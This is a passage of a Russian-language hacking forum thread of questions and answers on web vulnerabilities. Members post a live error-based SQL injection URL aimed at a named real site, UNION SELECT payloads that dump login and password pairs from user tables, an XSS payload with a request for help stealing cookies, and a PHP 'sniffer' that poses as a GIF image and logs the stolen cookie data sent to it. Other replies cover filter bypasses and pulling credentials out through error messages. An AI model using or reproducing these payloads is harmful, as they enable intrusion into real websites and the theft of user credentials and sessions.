Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    насчёт той скули, которая была в корне раздела ( http://chatium.com/user/profile?id=\' )
    http://chatium.com/user/profile?id=1\') and (select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a) -- 1
     
    1 person likes this.
  2. boortyhuhtyu

    boortyhuhtyu Member

    Joined:
    2 Feb 2011
    Messages:
    727
    Likes Received:
    26
    Reputations:
    -6
    активная xss <image style=background:url(javascript:alert(/wj/))>
    помогите составить правельный скрипт чтобы куки передались.....
     
  3. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    http://forum.antichat.net/thread44125.html в статье расписано всё как нельзя лучше
     
  4. boortyhuhtyu

    boortyhuhtyu Member

    Joined:
    2 Feb 2011
    Messages:
    727
    Likes Received:
    26
    Reputations:
    -6
    ........
     
    #16064 boortyhuhtyu, 10 Feb 2011
    Last edited: 2 Jan 2012
    1 person likes this.
  5. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    я бы сделал например такой сниффер, чтобы он возвращал картинку:
    Code:
    <?php
    header("Content-type:image/gif");
    $f = fopen("file.txt","a");
    fputs($f,UrlDecode($_SERVER('QUERY_STRING')).'\n');
    fclose($f);
    include("s.gif");
    ?> 
    
    По памяти пишу, могут быть какие-то мелкие ошибки, но идея думаю ясна
     
    2 people like this.
  6. Komyak

    Komyak Banned

    Joined:
    14 Jan 2009
    Messages:
    202
    Likes Received:
    18
    Reputations:
    1
    Подскажите со скулёй.
    Ковырялся на денвере в скриптах одного слитого сайта, на локалке все прекрасно работает, а в сети не хочет.

    На денвере провожу запросы вида:
    Code:
    ' UNION SELECT 1,concat(login,0x3a,password),3,4,5,6,7 FROM users/*
    
    ' UNION SELECT 1,concat(login,0x3a,password),3,4,5 FROM users LIMIT 1,1/*
    
    //Количество столбцов разное т.к. делаю через разные скрипты.
    
    А на серваке не хочет ничего делать:
    И так
    Code:
    ' UNION SELECT 1,concat(login,0x3a,password),3,4,5,6,7 FROM users/*
    
    ' UNION SELECT 1,concat(login,0x3a,password),3,4,5 FROM users LIMIT 1,1/*
    
    
    и вот так
    Code:
    ' UNION SELECT 1,concat(login,0x3a,password),3,4,5,6,7 FROM users --
    
    ' UNION SELECT 1,concat(login,0x3a,password),3,4,5 FROM users LIMIT 1,1 --
    
    
    В ответ получаю:
    Что ещё можно попробовать?
     
    1 person likes this.
  7. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    попробуй выложить скрипт
     
  8. Komyak

    Komyak Banned

    Joined:
    14 Jan 2009
    Messages:
    202
    Likes Received:
    18
    Reputations:
    1
    GPRS, замучаюсь. Только разобрался путём тыка:
    После коммента -- поставил + и всё заработало =))
     
  9. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    PHP:
    $text filter_var ($textFILTER_SANITIZE_STRING); 
    Долее переменная $text вставляется в запрос ".... WHERE text='".$text."' ...."
    Возможно ли обойти данный фильтр?
     
  10. .while

    .while Member

    Joined:
    22 Feb 2010
    Messages:
    40
    Likes Received:
    5
    Reputations:
    0
    если же в скрипте фильтруются кавычки, а возможно что-то еще, в следствии чего выводит "Hacking attempt!" возможно ли обойти?
     
  11. Dare

    Dare Elder - Старейшина

    Joined:
    26 Apr 2010
    Messages:
    53
    Likes Received:
    24
    Reputations:
    17
    Да шанс есть, попробуй крутить как слепую.
     
  12. boortyhuhtyu

    boortyhuhtyu Member

    Joined:
    2 Feb 2011
    Messages:
    727
    Likes Received:
    26
    Reputations:
    -6
    .......
     
    #16072 boortyhuhtyu, 12 Feb 2011
    Last edited: 2 Jan 2012
  13. -=Razor=-

    -=Razor=- Member

    Joined:
    20 Dec 2008
    Messages:
    30
    Likes Received:
    29
    Reputations:
    3
    Доступ к денверу из локалки
     
  14. rootmd

    rootmd New Member

    Joined:
    9 Dec 2010
    Messages:
    101
    Likes Received:
    3
    Reputations:
    -5
    Есть sql injection. трабла в том что в скрипте 2 запросы к бд. Если ставить "union+select+1" то ошибка "the used select statements have a different nubmer of columns", a если ставить "union+select+1,2,3.." то такая же ошибка только теперь у первого запроса.

    Вот код:
    Code:
    
    $requestid = $_GET[requestid];
    
    $res2 = mysql_query("select count(addedrequests.id) from addedrequests inner join users on addedrequests.userid = users.id inner join requests on addedrequests.requestid = requests.id WHERE addedrequests.requestid =$requestid") or die(mysql_error());
    $row = mysql_fetch_array($res2);
    $count = $row[0];
    
    
    $res = mysql_query("select users.id as userid,users.username, users.downloaded,users.uploaded, requests.id as requestid, requests.request from addedrequests inner join users on addedrequests.userid = users.id inner join requests on addedrequests.requestid = requests.id WHERE addedrequests.requestid =$requestid $limit") or sqlerr();
    
    
     
  15. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Вывод через ошибку:
    (1)and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--
    либо так (select*from(select name_const(version(),1),name_const(version(),1))a)
     
    1 person likes this.
  16. rootmd

    rootmd New Member

    Joined:
    9 Dec 2010
    Messages:
    101
    Likes Received:
    3
    Reputations:
    -5
    спасибки, работало, но как можно например не "from information_schema.tables" a "from users where id='1'"?
     
  17. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    вместо version() прописываешь например (select concat(username,0x3a,password) from users limit 0,1)
     
  18. rootmd

    rootmd New Member

    Joined:
    9 Dec 2010
    Messages:
    101
    Likes Received:
    3
    Reputations:
    -5
    спасибо. но есть еше такой;

    list.php?page=444444444444444444444444444444444

    Code:
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '6.66666666667E+33,15' at line 1
    можно что-то замутить или иреально?
     
  19. boortyhuhtyu

    boortyhuhtyu Member

    Joined:
    2 Feb 2011
    Messages:
    727
    Likes Received:
    26
    Reputations:
    -6
    что можно зделать с путями с открытыми на серваке?
    /images/spacer.gif
    /icons/
    /mail/
    /robots.txt
    /webmail/
    /changelog.txt
     
  20. DCrypt

    DCrypt Banned

    Joined:
    21 Jan 2010
    Messages:
    367
    Likes Received:
    35
    Reputations:
    1
    Ничего.

    Крути.
     
Thread Status:
Not open for further replies.